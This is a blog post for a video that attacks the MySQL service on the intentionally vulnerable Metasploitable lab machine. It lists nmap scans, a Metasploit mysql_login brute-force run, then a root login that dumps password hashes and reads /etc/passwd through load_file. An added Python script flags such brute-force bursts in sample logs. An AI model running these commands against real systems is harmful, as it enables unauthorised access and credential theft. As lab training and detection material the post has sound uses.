Metasploitable - MySQL

This video demonstrates an attack on the MySQL database service running on the Metasploitable hackable box.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com

Links

Download video: http://download.g0tmi1k.com/videos_archive/Metasploitable-MySQL.mp4

Download (debian_ssh_rsa_2048_x86.tar.bz2): Coming soon

Download (usernames.lst): Coming soon

Download (passwords.lst): Coming soon

Method

  • Use Nmap to scan the network (gathering information)
  • Use Nmap to do a more detailed scan of the target (gathering information)
  • Use Metasploit to brute force the login (gaining access)
  • Use the MySQL client to send commands to the database (discovering password hashes and reading files)

Tools

  • Nmap - on Backtrack 4 (Final)
  • Metasploit - on Backtrack 4 (Final)
  • MySQL - on Backtrack 4 (Final)
  • Dictionaries/Word-lists - Coming soon
  • Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)

Commands

nmap 192.168.1.1-255
nmap -sS -sV -O -f -n 192.168.1.105
msfconsole
search mysql
use scanner/mysql/mysql_login
show options
set RHOSTS 192.168.1.105
set USER_FILE /root/usernames.lst
set PASS_FILE /root/passwords.lst
exploit
mysql -h 192.168.1.105 -u root -p
root
show databases;
use mysql
show tables;
select User, Password from user;
select load_file('/etc/passwd');
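
From the defender's side, the dictionary attack run by mysql_login above shows up as a burst of failed logins from one source, possibly followed by a successful one. The following is an added example, not part of the original post, that scans log lines for that pattern; the log layout, addresses and account names are constructed, and the threshold and window are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from the video); the line layout is an assumption.
SAMPLE_LOG = """\
2010-07-15 10:01:40 4 Connect Access denied for user 'app'@'192.168.1.20' (using password: YES)
2010-07-15 10:01:55 5 Connect app@192.168.1.20 on shop
2010-07-15 10:02:01 6 Connect Access denied for user 'admin'@'192.168.1.50' (using password: YES)
2010-07-15 10:02:01 7 Connect Access denied for user 'admin'@'192.168.1.50' (using password: YES)
2010-07-15 10:02:02 8 Connect Access denied for user 'mysql'@'192.168.1.50' (using password: YES)
2010-07-15 10:02:02 9 Connect Access denied for user 'mysql'@'192.168.1.50' (using password: YES)
2010-07-15 10:02:03 10 Connect Access denied for user 'root'@'192.168.1.50' (using password: YES)
2010-07-15 10:02:03 11 Connect root@192.168.1.50 on
"""

FAIL = re.compile(r"^(\S+ \S+) .*Access denied for user '([^']*)'@'([^']+)'")
OK = re.compile(r"^(\S+ \S+) .*Connect\s+([^@\s]+)@(\S+) on\b")


def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with >= threshold failed logins inside `window`.

    Returns {source: {"failures", "users", "success_as"}}; success_as is the
    account of a successful login seen after the source was flagged, else None.
    """
    fails = defaultdict(list)  # source -> [(timestamp, user)]
    alerts = {}
    for line in log_text.splitlines():
        m = FAIL.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            user, src = m.group(2), m.group(3)
            fails[src].append((ts, user))
            recent = [t for t, _ in fails[src] if ts - t <= window]
            if src in alerts or len(recent) >= threshold:
                alerts[src] = {
                    "failures": len(fails[src]),
                    "users": sorted({u for _, u in fails[src]}),
                    "success_as": alerts.get(src, {}).get("success_as"),
                }
            continue
        m = OK.match(line)
        if m and m.group(3) in alerts:
            alerts[m.group(3)]["success_as"] = m.group(2)
    return alerts


if __name__ == "__main__":
    for src, info in detect(SAMPLE_LOG).items():
        print(src, info)
```

A flagged source with a non-empty success_as is the case to escalate: the guessing stopped because a credential worked.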

Notes

Song: Roberto Sol and Chris le Blanc; Ines - Sueno Damor

Video length: 3:24

Capture length: 9:14

Blog Post: https://blog.g0tmi1k.com/2010/07/metasploitable-mysql/